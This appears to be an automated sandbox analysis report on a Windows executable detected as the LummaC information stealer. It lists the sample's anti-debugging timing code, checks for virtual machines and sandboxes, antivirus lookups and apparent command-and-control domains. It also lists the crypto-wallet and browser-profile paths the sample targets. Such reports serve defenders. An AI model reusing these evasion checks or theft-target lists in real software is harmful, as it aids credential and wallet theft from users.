Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380AB8 second address: 5380ADF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 4EC02E2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov esi, 08BB9F15h 0x00000014 jmp 00007F4BA0D3F162h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380C0A second address: 5380C2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3970Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4BA0D3970Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380C2C second address: 5380C67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4C11A42E9Ah 0x0000000f pushad 0x00000010 mov ebx, eax 0x00000012 mov edx, ecx 0x00000014 popad 0x00000015 cmp dword ptr [ebp+08h], 00002000h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4BA0D3F161h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380C67 second address: 5380C6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380C6D second address: 5380C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53909C4 second address: 53909CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53909CA second address: 53909CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53909CF second address: 53909D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53909D5 second address: 53909D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53909D9 second address: 53909DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53909DD second address: 53909EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bh, ah 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53909EC second address: 53909F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53909F2 second address: 53909F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53909F6 second address: 53909FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53909FA second address: 5390A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov edx, ecx 0x0000000c popad 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4BA0D3F167h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5390A21 second address: 5390A27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5390A27 second address: 5390A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5390A2B second address: 5390A2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5390A2F second address: 5390ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b jmp 00007F4BA0D3F15Dh 0x00000010 pushfd 0x00000011 jmp 00007F4BA0D3F160h 0x00000016 and cx, C158h 0x0000001b jmp 00007F4BA0D3F15Bh 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, esi 0x00000023 pushad 0x00000024 mov ebx, esi 0x00000026 call 00007F4BA0D3F160h 0x0000002b mov cx, FD91h 0x0000002f pop ecx 0x00000030 popad 0x00000031 push eax 0x00000032 pushad 0x00000033 mov edx, ecx 0x00000035 jmp 00007F4BA0D3F166h 0x0000003a popad 0x0000003b xchg eax, esi 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f pushfd 0x00000040 jmp 00007F4BA0D3F15Dh 0x00000045 sub ax, 3106h 0x0000004a jmp 00007F4BA0D3F161h 0x0000004f popfd 0x00000050 push ecx 0x00000051 pop edi 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5390ACB second address: 5390B39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 mov bh, ch 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esi, dword ptr [ebp+0Ch] 0x0000000d jmp 00007F4BA0D39717h 0x00000012 test esi, esi 0x00000014 jmp 00007F4BA0D39716h 0x00000019 je 00007F4C11A36FB6h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F4BA0D3970Dh 0x00000028 and ecx, 530A2D26h 0x0000002e jmp 00007F4BA0D39711h 0x00000033 popfd 0x00000034 pushad 0x00000035 popad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5390BDF second address: 5390BEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3F15Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5390BEF second address: 5390BF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Special instruction interceptor: First address: E47C6C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Special instruction interceptor: First address: EC8E87 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe TID: 7508	Thread sleep time: -34017s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe TID: 7604	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe TID: 7496	Thread sleep time: -30015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe TID: 7504	Thread sleep time: -30015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe TID: 7484	Thread sleep time: -40020s >= -30000s	Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

Last function: Thread delayed

Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696503903o
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696503903}
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696503903h
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: jSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377203938.0000000001643000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976312464.00000000015F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696503903]
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377203938.0000000001643000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696503903\|UE
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696503903t
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696503903s
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696503903d
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696503903j
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696503903f
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696503903
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696503903p
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: jSFUzuYPG9.exe, 00000000.00000002.1974867741.0000000000E28000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.5.dr	Binary or memory string: VMware-42 27 b7 a3 1e b0 86 f3-0a fe 06 07 d0 80 07 92
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696503903x
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696503903x
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696503903
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696503903
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696503903
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696503903u
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696503903
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696503903}
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696503903x
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E44000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: NVMware2
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696503903t
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696503903
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: jSFUzuYPG9.exe, 00000000.00000002.1974867741.0000000000E28000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: NTICE
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: SICE
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Process queried: DebugPort	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: rapeflowwj.lat
Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: crosshuaht.lat
Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: sustainskelet.lat
Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: aspecteirs.lat
Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: energyaffai.lat
Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: necklacebudi.lat
Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: discokeyus.lat
Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: grannyejh.lat
Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: sweepyribs.lat

Source: jSFUzuYPG9.exe, 00000000.00000002.1975085759.0000000000E69000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: nProgram Manager

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: jSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000003.1499562858.00000000016AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %\Windows Defender\MsMpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: jSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: jSFUzuYPG9.exe PID: 7428, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: jSFUzuYPG9.exe	String found in binary or memory: Wallets/Electrum
Source: jSFUzuYPG9.exe	String found in binary or memory: Wallets/ElectronCash
Source: jSFUzuYPG9.exe	String found in binary or memory: window-state.json
Source: jSFUzuYPG9.exe, 00000000.00000003.1451476737.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Jaxx Libertyn
Source: jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: jSFUzuYPG9.exe	String found in binary or memory: Wallets/Ethereum
Source: jSFUzuYPG9.exe, 00000000.00000003.1477686530.00000000016A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
